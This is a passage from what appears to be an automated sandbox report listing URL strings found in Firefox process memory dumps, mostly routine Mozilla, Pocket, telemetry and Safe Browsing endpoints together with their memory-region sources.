Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A512000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A52F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/cfworkerjson-pointer-uri-fragmentInstance
Source: firefox.exe, 00000019.00000003.2008800285.000001EBF92D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2015701743.000001EBF92D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1955684141.000001EBF92D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000019.00000003.2008800285.000001EBF92D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2015701743.000001EBF92D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1955684141.000001EBF92D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000019.00000003.1561927088.000001EBF184A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562303877.000001EBF1875000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1560793169.000001EBF1600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562132964.000001EBF1863000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561053890.000001EBF181A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000019.00000003.2063744075.000001EBFE9B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/uuidjs/uuid#getrandomvalues-not-supported
Source: firefox.exe, 00000019.00000003.2096804568.000001EBFDAEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000019.00000003.1954043154.000001EBFE2EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000019.00000003.2074183845.000001EBFE052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2093698876.000001EBFE072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/apps/oldsyncS
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000019.00000003.2074183845.000001EBFE052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2093698876.000001EBFE072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/cmd/H
Source: firefox.exe, 00000019.00000003.2074183845.000001EBFE052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2093698876.000001EBFE072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/cmd/HCX
Source: firefox.exe, 00000019.00000003.2074183845.000001EBFE052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2093698876.000001EBFE072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryU
Source: firefox.exe, 00000019.00000003.2074183845.000001EBFE052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2093698876.000001EBFE072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryUFj
Source: firefox.exe, 00000019.00000003.1736195783.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3716622182.000002FB911C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.25.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: firefox.exe, 00000019.00000003.2094849166.000001EBFDCB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2077411286.000001EBFDCB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000019.00000003.2072795111.000001EBFDEB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/4d06924e-4c1b-4526-b5a3-3c515
Source: firefox.exe, 00000019.00000003.2096603394.000001EBFDC24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/01e461df-d85d-4561-
Source: firefox.exe, 00000019.00000003.2096603394.000001EBFDC24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/3b7fc3d4-90d3-48a3-
Source: firefox.exe, 00000019.00000003.2096603394.000001EBFDC24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/7a2753ed-91a9-454c
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schemaInstance
Source: firefox.exe, 00000019.00000003.1886466860.000001EBEDD84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1682385669.000001EBF241B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1734012663.000001EBF2434000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000019.00000003.1885923417.000001EBEDDA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000019.00000003.1885923417.000001EBEDDA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1682385669.000001EBF241B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000019.00000003.1653540755.000001EBF45A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000019.00000003.1653540755.000001EBF45A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000019.00000003.1882877986.000001EBEFCAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1568418519.000001EBF1033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2035398520.000001EBF1035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000019.00000003.1882877986.000001EBEFCAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1568418519.000001EBF1033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2035398520.000001EBF1035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000019.00000003.1686603429.000001EBEFC9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000019.00000003.1882877986.000001EBEFCAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1568418519.000001EBF1033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2035398520.000001EBF1035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000019.00000003.1686603429.000001EBEFC9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000019.00000003.2028612096.000001EBFEC92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mathiasbynens.be/
Source: firefox.exe, 00000019.00000003.2028612096.000001EBFEC92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding#surrogate-formulae
Source: firefox.exe, 00000019.00000003.2028612096.000001EBFEC92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mathiasbynens.be/notes/javascript-escapes#single
Source: firefox.exe, 0000001F.00000002.3716622182.000002FB91172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A590000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000019.00000003.1954742353.000001EBFF730000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1885844560.000001EBEDDBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000019.00000003.1966895160.000001EBF1412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: firefox.exe, 00000019.00000003.2028612096.000001EBFEC92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mths.be/jsesc
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000019.00000003.1882877986.000001EBEFCAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1568418519.000001EBF1033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2035398520.000001EBF1035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 00000019.00000003.1882877986.000001EBEFCAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1568418519.000001EBF1033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2035398520.000001EBF1035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000019.00000003.1568418519.000001EBF1033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2035398520.000001EBF1035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s4
Source: firefox.exe, 00000019.00000003.1686603429.000001EBEFC9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000019.00000003.1686639668.000001EBEFC74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/credit
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000019.00000003.2096280954.000001EBFDC3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2091678949.000001EBFDF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2069124537.000001EBFDF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2071530420.000001EBFDF80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
